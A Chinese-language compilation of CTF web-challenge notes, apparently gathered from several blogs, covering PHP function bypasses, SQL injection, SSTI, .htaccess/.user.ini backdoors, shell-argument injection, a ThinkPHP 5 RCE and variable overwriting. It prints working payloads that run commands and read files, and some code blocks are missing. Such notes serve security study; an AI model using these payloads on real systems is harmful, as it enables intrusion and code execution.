目录
1、使用scandir()函数+chr()函数绕过代码执行
2、.user.ini 与.htaccess
利用.user.ini上传\隐藏后门
利用.htaccess上传\隐藏后门
1、.htaccess文件
2、文件上传绕过
3、留后门
3、strcmp()函数安全漏洞
4、MD5注入,数组绕过MD5比较
5、PHP://input php://filter data://
6、sql注入空格,#,-- 等绕过
7、在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。
8、SSTI注入
9、堆叠注入骚操作
1、修改表名
2、预编译
3、HANDLER
10、java容器
WEB-INF/web.xml泄露
11、escapeshellarg/escapeshellcmd函数
12、CTF中的CVE-2020-7066 PHP中get_headers函数
CVE-2020-7066
13、PHP Parametric Function RCE-套娃-什么是无参数函数RCE
前言
什么是无参数函数RCE
法1:getenv()
法二:getallheaders()
法三:get_defined_vars()
法四:session_id()
法五:dirname() & chdir()
方法6
一、scandir()
二、localeconv()
三、current()
四、next()
五、array_reverse()
14 、thinkphp5 漏洞
15、MD5强相等性绕过
情况1:$a!==&b&&md5($a)===md5($b)
情况2:(string)$a!==(string)&b&&md5($a)===md5($b)
16、php变量覆盖
0x01 $$导致的变量覆盖问题
0x02 extract()函数导致的变量覆盖问题
0x03 parse_str函数导致的变量覆盖问题
4.import_request_variables()变量覆盖
5.PHP全局变量覆盖
17、preg_replace php
18、gopher协议
scandir()
函数+chr()
函数绕过代码执行[RoarCTF 2019]Easy Calc https://buuoj.cn
wp:https://blog.csdn.net/mochu7777777/article/details/109169796
注意点:
使用scandir()
函数+chr()
函数绕过代码执行
/calc.php?%20num=var_dump(scandir(chr(47)))
或者使用glob()
函数
/calc.php?%20num=var_dump(glob(chr(47).chr(42)))
利用file_get_contents()
进行读取
var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
.user.ini
上传\隐藏后门
使用条件:
(1)服务器脚本语言为PHP
(2)对应目录下面有可执行的php文件
(3)服务器使用CGI/FastCGI模式
.user.ini
实际上就是一个可以由用户“自定义”的php.ini
,我们可以自定义除了PHP_INI_SYSTEM
以外的模式,在执行php代码之前,系统会对.user.ini
先做一个执行,然后才执行其他的php文件。
我们这边利用.user,ini
先执行auto_prepend_file
函数,auto_prepend_file
表示在php程序加载第一个php代码前加载的php文件,也就是先加载了a.jpg里面的文件,即一句话木马。
然后利用蚁剑连接即可。
https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html
题目:[SUCTF 2019]CheckIn
wp:https://www.jianshu.com/p/2907426b4a91
.user.ini
GIF89a
auto_prepend_file=01.gif
01.gif
GIF89a
上传后调用目录下的php文件,加载用户‘.user.ini’设置包含01.gif文件中的内容
一般.htaccess可以用来留后门和针对黑名单绕过
创建一个txt写入(png解析为php)
AddType application/x-httpd-php .png
另存为.htaccess
上传.htaccess 必须是网站根路径
可以在.htaccess 加入php解析规则
类似于把文件名包含123456的解析成php
SetHandler application/x-httpd-php
123456.png 就会以php执行
题目:[MRCTF2020]你传你马呢
wp:https://blog.csdn.net/alexhcf/article/details/108415941
知识点:利用.Htaccess文件构成的PHP后门https://www.cnblogs.com/mrhonest/p/11769820.html
[极客大挑战 2019]BuyFlag
[PHP安全特性学习]strcmp()函数安全漏洞
https://www.cnblogs.com/xhds/p/12312055.html
注意看这里我们构造money为一个数组数组传值为1,而strcmp要求我们传入字符串 strcmp函数判断不是字符串会报错,但是会return0 所以我们的目的达到了得到flag
[BJDCTF2020]Easy MD5
https://blog.csdn.net/qq_43622442/article/details/105662589
password='".md5($pass,true)."'https://www.jianshu.com/p/12125291f50d
sql注入:md5($password,true)https://blog.csdn.net/March97/article/details/81222922
select * from 'admin' where password=md5($pass,true)
md5('ffifdyop',true) 为:'or'6�]��!r,��b拼接到sql语句中为:select * from 'admin' where password='or'6�]��!r,��b使where条件为永真值,完成注入
md5(string,raw)
md5函数在指定了true的时候,是返回的原始 16 字符二进制格式。也就是说会返回这样子的字符串:'or’6\xc9]\x99\xe9!r,\xf9\xedb\x1c(抄的= =)
然后就会拼接成:
(题目的提示感觉还是有点问题的,因为md5函数返回的是字符串,后端应该会用单引号/双引号包起来的),所以应该会拼接为这样子:
数组绕过MD5(&a)==MD5(&b),a、b赋值为数组,因为都返回null所以相同。$a[]=1&$b[]=2
[ZJCTF 2019]NiZhuanSiWei
wp:https://www.cnblogs.com/wangtanzhi/p/12184759.html
https://www.php.net/manual/zh/wrappers.php.php
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
echo "".file_get_contents($text,'r')."
";
if(preg_match("/flag/",$file)){
echo "Not now!";
exit();
}else{
include($file); //useless.php
$password = unserialize($password);
echo $password;
}
}
else{
highlight_file(__FILE__);
}
?>
text绕过:text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
或者:data://text/plain,welcome to the zjctf
读取文件:file=php://filter/read=convert.base64-encode/resource=useless.php
反序列化
class Flag{ //flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "
";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
$a = new Flag();
$a->file="flag.php";
var_dump(serialize($a))
string(41) "O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}"
[CISCN2019 华北赛区 Day2 Web1]Hack World
wp:https://www.cnblogs.com/20175211lyz/p/11435298.html
https://www.cnblogs.com/chrysanthemum/p/11740505.html
https://blog.csdn.net/weixin_43345082/article/details/99062970
盲注测试 1/1 2/1 作为数值型注入测试数据
盲注方法:
异或方法:id=1^(if((ascii(substr((select(flag)from(flag)),1,1))=102),0,1))
if方法:id=if(ascii(substr((select(flag)from(flag)),1,1))=ascii('f'),1,2)
题目:[GXYCTF2019]BabySQli
wp:https://www.cnblogs.com/gaonuoqi/p/12355035.html
先说说base32 和 base64 的区别,
base32 只有大写字母和数字数字组成,或者后面有三个等号。
base64 只有大写字母和数字,小写字母组成,后面一般是两个等号。
当查询的数据不存在的时候,联合查询就会构造一个虚拟的数据。
比如:(自己没这个环境也没搭建,借其他博客的图片举个例子,大佬莫怪)
原先的表有这三个字段,有这样的数据内容
原先的表
我们如果在查询的时候输入这样的查询语句:
查询语句
发现我们在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。这时候直接在pass框里面输入e10adc3949ba59abbe56e057f20f883e
的md5解密结果就可以了。
https://www.anquanke.com/post/id/188172
flask之ssti模版注入从零到入门https://xz.aliyun.com/t/3679
浅析SSTI(python沙盒绕过)https://bbs.ichunqiu.com/thread-47685-1-1.html
https://www.cnblogs.com/buchuo/p/12559408.html
SSTI注入绕过(沙盒逃逸原理一样)https://www.cnblogs.com/zaqzzz/p/10263396.html
题目:[BJDCTF 2nd]fake google
wp:https://www.cnblogs.com/h3zh1/p/12549581.html
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /')).read()") }}{% endif %}{% endfor %}
{% for c in [].__class__.__base__.__subclasses__()%}{% if c.__name__=='catch_warings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()") }}{% endif %}{% endfor %}
{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% if b.__class__ == {}.__class__ %} {% if 'eval' in b.keys() %} {{ b['eval']('__import__("os").popen("id").read()') }} {% endif %} {% endif %} {% endfor %} {% endif %} {% endfor %}
def find_eval():
for i,item in enumerate("".__class__.__bases__[0].__subclasses__()):
# if item.__name__ == 'catch_warnings':
if item.__name__=='catch_warnings':
print(item)
# for key,b in item.__init__.__globals__.items():
for b in item.__init__.__globals__.values():
if b.__class__ == {}.__class__:
if 'eval' in b.keys():
print(b["eval"]('__import__("os").popen("whoami").read()'))
https://www.cnblogs.com/gaonuoqi/p/12398554.html
[GYCTF2020]Blacklist
这题是用堆叠注入,同时也是借这题记录一下CTF中堆叠注入的一些骚操作
以下部分内容转载大佬的文章
show databases; 获取数据库名
show tables; 获取表名
show columns from `table_name`; 获取列名
绕过技巧
用 “[强网杯 2019]随便注” 为例, 这里有两个表,一个是 ’ 1919810931114514 ‘ ,还有一个是’words‘ , words表中有id和data两个字段,1919810931114514表中有flag的字段
因为可以看到回显是两个数据,猜测应该是words表
推测 内部语句应该是
select id,data from words where id='$id'
那么骚操作开始了,有点像偷天换日的意思
1、将words表名替换成其他的
2、然后将 `1919810931114514` 这个表名称替换成words
3、在把flag这个字段替换成data
4、最后再插入一个id字段
最终的查询结果就可以输出我们构造的新的words了
payload 如下
1';
alter table words rename to words1;
alter table `1919810931114514` rename to words;
alter table words change flag id varchar(50);#
最后用 1' or 1=1# 把flag打印出来
依旧是以“[强网杯 2019]随便注” 为例,先构造一个sql语句,然后执行它,payload转化成16进制绕过waf
1';
SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;
prepare execsql from @a;
execute execsql;#
以 ”[GYCTF2020]Blacklist“ 为例,因为前面关键字都被禁用了,所以前面的payload都无效了
但是这里还有一种新姿势,参考官方文档
HANDLER ... OPEN
语句打开一个表,使其可以使用后续HANDLER ... READ
语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER ... CLOSE
或会话终止之前不会关闭
1';
HANDLER FlagHere OPEN;
HANDLER FlagHere READ FIRST;
HANDLER FlagHere CLOSE;#
WEB-INF主要包含一下文件或目录:
/WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。
/WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中
/WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件
/WEB-INF/src/:源码目录,按照包名结构放置各个java文件。
/WEB-INF/database.properties:数据库配置文件
漏洞检测以及利用方法:通过找到web.xml文件,推断class文件的路径,最后直接class文件,在通过反编译class文件,得到网站源码
通常一些web应用我们会使用多个web服务器搭配使用,解决其中的一个web服务器的性能缺陷以及做均衡负载的优点和完成一些分层结构的安全策略等。在使用这种架构的时候,由于对静态资源的目录或文件的映射配置不当,可能会引发一些的安全问题,导致web.xml等文件能够被读取。漏洞检测以及利用方法:通过找到web.xml文件,推断class文件的路径,最后直接class文件,在通过反编译class文件,得到网站源码。一般情况,jsp引擎默认都是禁止访问WEB-INF目录的,Nginx 配合Tomcat做均衡负载或集群等情况时,问题原因其实很简单,Nginx不会去考虑配置其他类型引擎(Nginx不是jsp引擎)导致的安全问题而引入到自身的安全规范中来(这样耦合性太高了),修改Nginx配置文件禁止访问WEB-INF目录就好了: location ~ ^/WEB-INF/* { deny all; } 或者return 404; 或者其他!
当get参数出错时,修改Get为post参数,看到FlagController
payload:
/WEB-INF/web.xml
filename=WEB-INF/classes/com/wm/ctf/FlagController.class
题目:
RoarCTF 2019-WEB-Easy Java
wp:https://www.jianshu.com/p/cb7cbede3b37
题目:[CTF]网鼎杯2020-青龙组-Web-FileJava-WriteUp
wp:https://blog.csdn.net/alex_bean/article/details/106124750
https://blog.csdn.net/a965527596/article/details/106177477/
Apache POI XML外部实体(XML External Entity,XXE)攻击详解:https://www.jianshu.com/p/73cd11d83c30
题目:[BUUCTF 2018]Online Tool
wp:https://blog.csdn.net/qq_26406447/article/details/100711933
escapeshellarg和escapeshellcmd的功能
escapeshellarg
1.确保用户只传递一个参数给命令
2.用户不能指定更多的参数一个
3.用户不能执行不同的命令
escapeshellcmd
1.确保用户只执行一个命令
2.用户可以指定不限数量的参数
3.用户不能执行不同的命令
我们详细分析一下:
172.17.0.2' -v -d a=1
escapeshellarg
处理后变成了'172.17.0.2'\'' -v -d a=1'
,即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。escapeshellcmd
处理后变成'172.17.0.2'\\'' -v -d a=1\'
,这是因为escapeshellcmd
对\
以及最后那个不配对儿的引号进行了转义:http://php.net/manual/zh/function.escapeshellcmd.phpcurl '172.17.0.2'\\'' -v -d a=1\'
,由于中间的\\
被解释为\
而不再是转义字符,所以后面的'
没有被转义,与再后面的'
配对儿成了一个空白连接符。所以可以简化为curl 172.17.0.2\ -v -d a=1'
,即向172.17.0.2\
发起请求,POST 数据为a=1'
。回到mail
中,我们的 payload 最终在执行时变成了'-fa'\\''\( -OQueueDirectory=/tmp -X/var/www/html/test.php \)@a.com\'
,分割后就是-fa\(
、-OQueueDirectory=/tmp
、-X/var/www/html/test.php
、)@a.com'
,最终的参数就是这样被注入的。
谁的锅?
仔细想想其实这可以算是escapeshellarg
和escapeshellcmd
的设计问题,因为先转义参数再转义命令是很正常的想法,但是它们在配合时并没有考虑到单引号带来的隐患。
在 PHPMailer 的这次补丁中,作者使用escapeshellarg
意在防止参数注入,但是却意外的为新漏洞打了助攻,想想也是很有趣的 xD。
攻击面
如果应用使用escapeshellarg -> escapeshellcmd
这样的流程来处理输入是存在隐患的,mail
就是个很好的例子,因为它函数内部使用了escapeshellcmd
,如果开发人员仅用escapeshellarg
来处理输入再传给mail
那这层防御几乎是可以忽略的。
如果可以注入参数,那利用就是各种各样的了,例如 PHPMailer 和 RoundCube 中的mail
和 Naigos Core 中的 curl
都是很好的参数注入的例子。
有一点需要注意的是,由于注入的命令中会带有中间的\
和最后的'
,有可能会影响到命令的执行结果,还要结合具体情况再做分析。
利用/绕过 PHP escapeshellarg/escapeshellcmd函数 https://www.anquanke.com/post/id/107336
PHP escapeshellarg()+escapeshellcmd() 之殇 https://paper.seebug.org/164/
题目:[GKCTF2020]cve版签到
wp:https://blog.csdn.net/qq_45521281/article/details/106425266
https://blog.csdn.net/weixin_44348894/article/details/105568428
http://4f0ced25-584e-406c-a3ac-c8334fd9b49e.node3.buuoj.cn/?url=http://127.0.0.123%00.ctfhub.com
使用%00 或者是\0进行网址截断造成注入
知识点:
在PHP开发中,我们经常需要获取HTTP请求中发送的服务器信息,本文通过一个简单的PHP示例介绍了通过get_headers函数获取服务器的相关信息。
get_headers() 是PHP系统级函数,他返回一个包含有服务器响应一个 HTTP 请求所发送的标头的数组。 如果失败则返回 FALSE 并发出一条 E_WARNING 级别的错误信息(可用来判断远程文件是否存在)。
array get_headers ( string $url [, int $format = 0 ] )
url 目标 URL
示例
以上例程的输出类似于:
Array(
[0] => HTTP/1.1 200 OK
[1] => Date: Sat, 29 May 2004 12:28:13 GMT
[2] => Server: Apache/1.3.27 (Unix) (Red-Hat/Linux)
[3] => Last-Modified: Wed, 08 Jan 2003 23:11:55 GMT
[4] => ETag: "3f80f-1b6-3e1cb03b"
[5] => Accept-Ranges: bytes
[6] => Content-Length: 438
[7] => Connection: close
[8] => Content-Type: text/html
)Array(
[0] => HTTP/1.1 200 OK
[Date] => Sat, 29 May 2004 12:28:14 GMT
[Server] => Apache/1.3.27 (Unix) (Red-Hat/Linux)
[Last-Modified] => Wed, 08 Jan 2003 23:11:55 GMT
[ETag] => "3f80f-1b6-3e1cb03b"
[Accept-Ranges] => bytes
[Content-Length] => 438
[Connection] => close
[Content-Type] => text/html
)
PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()
’函数存在安全漏洞。攻击者可利用该漏洞造成信息泄露。
描述
在低于7.2.29的PHP版本7.2.x,低于7.3.16的7.3.x和低于7.4.4的7.4.x中,将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符,则URL将被静默地截断。这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。
测试脚本:
题目:[GXYCTF2019]禁止套娃
wp:https://www.cnblogs.com/wangtanzhi/p/12260986.html
无参数函数RCE
exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));
exp=echo(readfile(array_rand(array_flip(scandir(chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion())))))))))))));
array_rand
从数组中随机取出一个键array_filp
交换数组键值
或者show_source(session_id(session_start()));
然后加上cookie PHPSESSID=flag.php
知识点:什么是无参数函数RCE https://skysec.top/2019/03/29/PHP-Parametric-Function-RCE/#%E4%BB%80%E4%B9%88%E6%98%AF%E6%97%A0%E5%8F%82%E6%95%B0%E5%87%BD%E6%95%B0RCE
最近做了一些php 无参数函数执行的题目,这里做一个总结,以便以后bypass各种正则过滤。
大致思路如下:
1.利用超全局变量进行bypass,进行RCE
2.进行任意文件读取
传统意义上,如果我们有
|
|
即代表我们拥有了一句话木马,可以进行getshell,例如
但是如果有如下限制
|
|
我们会发现我们使用参数则无法通过正则的校验
|
|
而该正则,正是我们说的无参数函数的校验,其只允许执行如下格式函数
|
|
但不允许
|
|
这样一来,失去了参数,我们进行RCE的难度则会大幅上升。
而本篇文章旨在bypass这种限制,并做出一些更苛刻条件的Bypass。
查阅php手册,有非常多的超全局变量
|
|
我们可以使用$_ENV
,对应函数为getenv()
虽然getenv()
可获取当前环境变量,但我们怎么从一个偌大的数组中取出我们指定的值成了问题
这里可以使用方法:
效果如下
但是我不想要下标,我想要数组的值,那么我们可以使用
两者结合使用即可有如下效果
我们则可用爆破的方式获取数组中任意位置需要的值,那么即可使用getenv(),并获取指定位置的恶意参数
之前我们获取的是所有环境变量的列表,但其实我们并不需要这么多信息。仅仅http header即可
在apache2环境下,我们有函数getallheaders()可返回
我们可以看一下返回值
|
|
我们可以看到,成功返回了http header,我们可以在header中做一些自定义的手段,例如
此时我们再将结果中的恶意命令取出
|
|
这样一来相当于我们将http header中的sky变成了我们的参数,可用其进行bypass 无参数函数执行
例如
那么可以进一步利用http header的sky属性进行rce
使用getallheaders()其实具有局限性,因为他是apache的函数,如果目标中间件不为apache,那么这种方法就会失效,我们也没有更加普遍的方式呢?
这里我们可以使用get_defined_vars(),首先看一下它的回显
发现其可以回显全局变量
|
|
我们这里的选择也就具有多样性,可以利用$_GET
进行RCE,例如
还是和之前的思路一样,将恶意参数取出
发现可以成功RCE
但一般网站喜欢对
|
|
做全局过滤,所以我们可以尝试从$_FILES
下手,这就需要我们自己写一个上传
可以发现空格会被替换成_
,为防止干扰我们用hex编码进行RCE
最终脚本如下
|
|
之前我们使用$_FILES
下手,其实这里还能从$_COOKIE
下手:
我们有函数
可以获取PHPSESSID的值,而我们知道PHPSESSID允许字母和数字出现,那么我们就有了新的思路,即hex2bin
脚本如下
|
|
即可达成RCE和bypass的目的
为什么一定要RCE呢?我们能不能直接读文件?
之前的方法都基于可以进行RCE,如果目标真的不能RCE呢?我们能不能进行任意读取?
那么想读文件,就必须进行目录遍历,没有参数,怎么进行目录遍历呢?
首先,我们可以利用getcwd()
获取当前目录
|
|
那么怎么进行当前目录的目录遍历呢?
这里用scandir()
即可
|
|
那么既然不在这一层目录,如何进行目录上跳呢?
我们用dirname()
即可
|
|
那么怎么更改我们的当前目录呢?这里我们发现有函数可以更改当前目录
|
|
将 PHP 的当前目录改为 directory。
所以我们这里在
|
|
进行如下设置即可
|
|
我们尝试读取/var/www/123
|
|
即可进行文件读取
无参RCE,先看能不能爆出目录:
百度得知,scandir的使用是至少必需要有一个directory的,但是我们又没有办法去定义一个变量,这时候就要考虑php有没有什么函数是自带常量的:
既然是数组,就要用到:
payload:?exp=print_r(scandir(current(localeconv())));
目录爆出来了,接下来该怎么操作,才能拿到flag.php的内容呢,我看到有一个函数:
那先在本地试一下:
"; // 当前元素是 Bill
echo next($people) . "
"; // Bill 的下一个元素是 Steve
echo next($people) . "
";
?>
运行结果:
两次next后取到了Mark,所以,payload:
?exp=highlight_file(next(next(next(scandir(current(localeconv()))))));
额,这个不对-,我又在本地测试了一下:
"; // 当前元素是 Bill
echo next(next($people)) . "
"; // Bill 的下一个元素是 Steve
?>
好吧,换个思路:scandir函数的返回值是一个数组,如果把数组逆序排列,再用一个next不就可以了吗,然后找到了:
highlight_file
输出,payload:
?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));
拿到flag。
题目:[BJDCTF 2nd]old-hack
wp:https://www.cnblogs.com/h3zh1/p/12549645.html
wp:https://blog.csdn.net/qq_41628669/article/details/106092105
payload/:
http://90b89500-3ac6-40a5-9f1e-e84e8923115f.node3.buuoj.cn
POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /
知识点:ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析https://xz.aliyun.com/t/3845
[漏洞分析]thinkphp 5.x全版本任意代码执行分析全记录 https://www.cnblogs.com/r00tuser/p/10103329.html
https://www.cnblogs.com/backlion/p/10106676.html
此情况,将变量a、b赋值为数组,数组赋予不同的值,MD5不能解析数组,返回NULL,两个NULL强相等
例如 a[]=1&b[]=2
示例代码:
$a=array(1);
$b=array(2);
var_dump($a);
echo "\n";
var_dump($b);
echo "\n";
var_dump(md5($a));
if ($a!==$b&&md5($a)===md5($b))
{
echo "yes";
}
else{
echo "false";
}
输出:
array(1) {
[0]=>
int(1)
}
array(1) {
[0]=>
int(2)
}
Warning: md5() expects parameter 1 to be string, array given in D:\phptest\928\md5===test.php on line 37
NULL
Warning: md5() expects parameter 1 to be string, array given in D:\phptest\928\md5===test.php on line 39
Warning: md5() expects parameter 1 to be string, array given in D:\phptest\928\md5===test.php on line 39
yes
变量做字符串强制转换后,结果如下
代码:
$a=array(1);
$b=array(2);
var_dump((string)$a);
echo "\n";
var_dump((string)$b);
输出:
Notice: Array to string conversion in D:\phptest\928\md5===test.php on line 53
string(5) "Array"
Notice: Array to string conversion in D:\phptest\928\md5===test.php on line 55
string(5) "Array"
(string)$a!与(string)$b变成了相等,因此此种情况,a、b的赋值为如下(大牛处拿来的)
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
示例代码:
$a="%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2";
$b="%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2";
var_dump(urldecode($a));
echo "\n";
var_dump(urldecode($b));
$a=urldecode($a);
$b=urldecode($b);
if ((string)$a!==(string)$b && md5($a) === md5($b) )
{
echo "yes\n";
}
else
echo "no \n";
输出:
string(64) "M�h��\ �r�w{r��o���V�J=�x>{���� �(K�n�KU�_Bu��Igm��U]�`�_��"
string(64) "M�h��\ �r�w{r��o���V�J=�x>{�����(K�n�KU�_Bu��Igm���]�`�_��"
yes
对应题目:[安洵杯 2019]easy_web
wp:https://blog.csdn.net/qq_43622442/article/details/106012150
wp:https://www.cnblogs.com/wangtanzhi/p/12244096.html
wp:https://www.jianshu.com/p/21e3e1f74c08
题目:[BJDCTF2020]Mark loves cat
wp:https://www.cnblogs.com/wangtanzhi/p/12309468.html
wp:https://blog.csdn.net/qq_43622442/article/details/105925473
代码分析
flag.php
index.php
$y){
$$x = $y;
}
foreach($_GET as $x => $y){
$$x = $$y;//变量覆盖点
}
foreach($_GET as $x => $y){
if($_GET['flag'] === $x && $x !== 'flag'){ //GET方式传flag只能传一个flag=flag
exit($handsome);
}
}
if(!isset($_GET['flag']) && !isset($_POST['flag'])){ //GET和POST都不传flag
exit($yds);
}
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){ //GET或POST传flag,必须是flag=flag
exit($is);
}
echo "the flag is: ".$flag;
通过三个if中的一个的exit()一个输出flag值
分析第一个if
foreach($_GET as $x => $y){
if($_GET['flag'] === $x && $x !== 'flag'){ //GET方式传flag只能传一个flag=flag
exit($handsome);
}
}
get传$_GET['flag'] ,则需要传flag=xx,此时在第二个foreach中,执行为$$x=$$y,则$flag=$xx,覆盖掉原来的flag值此处不可用
分析第二个if
if(!isset($_GET['flag']) && !isset($_POST['flag'])){ //GET和POST都不传flag
exit($yds);
}
get、post都不传flag,第一种情况通过get上传,数据为“?yds=flag”,在第二个foreach中,变量覆盖为$yds=$flag,目的达到。如果用post传,则只会改变yds值,不能输出flag值,例如post传“yds=flag”,在第一个foreach中执行为“$yds=flag”
分析第三个if
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){ //GET或POST传flag,必须是flag=flag
exit($is);
}
如果满足$_POST['flag'] === 'flag',则post传“flag=flag”,则在第一个foreach中执行“$flag=flag”,覆盖原来flag值,不可行
如果满足$_GET['flag'] === 'flag',则get传“?flag=flag”,则在第二个foreach'中执行“$flag=$flag”,flag值不变。需要将变量$is的值赋值为$flag值,通过get传“is=flag”,所以payload为“?is=flag&flag=flag”或“flag=flag&is=flag”
知识点:
代码审计|变量覆盖漏洞https://www.freebuf.com/column/150731.html
PHP中的变量覆盖漏洞 https://www.cnblogs.com/xhds/p/12587249.html
0x00 背景
近期在研究学习变量覆盖漏洞的问题,于是就把之前学习的和近期看到的CTF题目中有关变量覆盖的题目结合下进一步研究。
通常将可以用自定义的参数值替换原有变量值的情况称为变量覆盖漏洞。经常导致变量覆盖漏洞场景有:$$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局变量注册等。
本篇收集了几个CTF中的题目作为例子,对$$,extract(),parse_str()的问题进行总结。
$$ 导致的变量覆盖问题在CTF代码审计题目中经常在foreach中出现,如以下的示例代码,使用foreach来遍历数组中的值,然后再将获取到的数组键名作为变量,数组中的键值作为变量的值。因此就产生了变量覆盖漏洞。请求?name=test 会将$name的值覆盖,变为test。
1.
2.//?name=test
3.//output:string(4) "name" string(4) "test" string(4) "test" test
4.$name='thinking';
5.foreach ($_GET as $key => $value)
6. $$key = $value;
7. var_dump($key);
8. var_dump($value);
9. var_dump($$key);
10.echo $name;
11.?>
CTF中$$导致的变量覆盖问题的例题1:
题目源码:
1. $value) 10. $$key = $$value; 11.foreach ($_POST as $key => $value) 12. $$key = $value; 13.if ( $_POST["flag"] !== $flag ) 14. die($_403); 15.echo "This is your flag : ". $flag . "\n"; 16.die($_200); 17.?>
题目分析:
源码包含了flag.php文件,并且需要满足3个if里的条件才能获取flag,题目中使用了两个foreach并且也使用了$$.两个foreach中对 $$key的处理是不一样的,满足条件后会将$flag里面的值打印出来,所以$flag是在flag.php文件文件中的。
但是由于第7,11-14行间的代码会将$flag的值给覆盖掉了,所以需要先将$flag的值赋给$_200或$_403变量,然后利用die($_200)或 die($_403)将flag打印出来。
解题方法:
由于第7,11-14行间的代码会将$flag的值给覆盖掉,所以只能利用第一个foreach先将$flag的值赋给$_200,然后利用die($_200)将原本的flag值打印出来。
最终PAYLOAD:
本地复现,所以flag与原题不一样
GET DATA:?_200=flag
POST DATA:flag=aaaaaaaaaaaaaaaaaaaaa
extract() 该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。
extract()的用法参考:http://www.runoob.com/php/func-array-extract.html
语法: extract(array,extract_rules,prefix)
CTF中extract()导致的变量覆盖问题的例题1:
题目源码:
1.
2.$flag = 'xxx';
3.extract($_GET);
4.if (isset($gift)) {
5. $content = trim(file_get_contents($flag));
6. if ($gift == $content) {
7. echo 'hctf{...}';
8. } else {
9. echo 'Oh..';
10. }
11.}
12.?>
题目分析:
题目使用了extract($_GET)接收了GET请求中的数据,并将键名和键值转换为变量名和变量的值,然后再进行两个if 的条件判断,所以可以使用GET提交参数和值,利用extract()对变量进行覆盖,从而满足各个条件。
解题方法:
GET请求 ?flag=&gift=,extract()会将$flag和$gift的值覆盖了,将变量的值设置为空或者不存在的文件就满足$gift == $content。
最终PAYLOAD:
GET DATA: ?flag=&gift=
CTF中extract()导致的变量覆盖问题的例题2:
题目源码:
1.
2.
3. extract($_POST);
4. if ($pass == $thepassword_123) { ?>
5.
6.
7.
8.
9.
题目分析:
题目要求使用POST提交数据,extract($_POST)会将POST的数据中的键名和键值转换为相应的变量名和变量值,利用这个覆盖$pass和$thepassword_123变量的值,从而满足$pass == $thepassword_123这个条件。
解题方法:
使用POST请求提交pass=&thepassword_123=, 然后extract()会将接收到的数据将$pass和$thepassword_123变量的值覆盖为空,便满足条件了。
最终PAYLOAD:
POST DATA:pass=&thepassword_123=
parse_str() 函数用于把查询字符串解析到变量中,如果没有array 参数,则由该函数设置的变量将覆盖已存在的同名变量。
语法:parse_str(string,array)
parse_str() 用法参考:http://php.net/parse_str
CTF中parse_str()导致的变量覆盖问题的例题1:
题目源码:
1.
2.error_reporting(0);
3.if (empty($_GET['id'])) {
4. show_source(__FILE__);
5. die();
6.} else {
7. include ('flag.php');
8. $a = "www.OPENCTF.com";
9. $id = $_GET['id'];
10. @parse_str($id);
11. if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) {
12. echo $flag;
13. } else {
14. exit('其实很简单其实并不难!');
15. }
16.}
17.?>
题目分析:
